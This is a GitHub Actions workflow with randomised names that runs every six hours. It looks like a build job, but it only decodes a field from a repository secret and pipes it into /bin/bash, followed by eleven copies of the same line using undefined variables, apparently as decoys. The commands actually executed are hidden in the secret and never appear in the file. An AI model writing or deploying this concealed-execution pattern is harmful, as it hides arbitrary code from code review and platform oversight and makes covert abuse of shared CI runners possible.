name: zhuyhdaohy
on:
  workflow_dispatch:
  schedule:
    - cron: '40 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuyhdaohy
        env:
          n9184: ${{ secrets.n9184 }}
        run: |
          echo $n9184 | jq -r .lb8442 | /bin/bash
          echo $s2 | jq -r .z43876 | /bin/bash
          echo $evmwy13574 | jq -r .es10191 | /bin/bash
          echo $z6 | jq -r .gkr5 | /bin/bash
          echo $a2280 | jq -r .duthl459 | /bin/bash
          echo $p99111 | jq -r .bsym83497 | /bin/bash
          echo $dqjqm63820 | jq -r .iyqax956 | /bin/bash
          echo $nx0 | jq -r .k656 | /bin/bash
          echo $vk3495 | jq -r .y3 | /bin/bash
          echo $qgdqh3548 | jq -r .f887 | /bin/bash
          echo $kgmn67 | jq -r .wkvq957 | /bin/bash
          echo $p29136 | jq -r .dh27 | /bin/bash

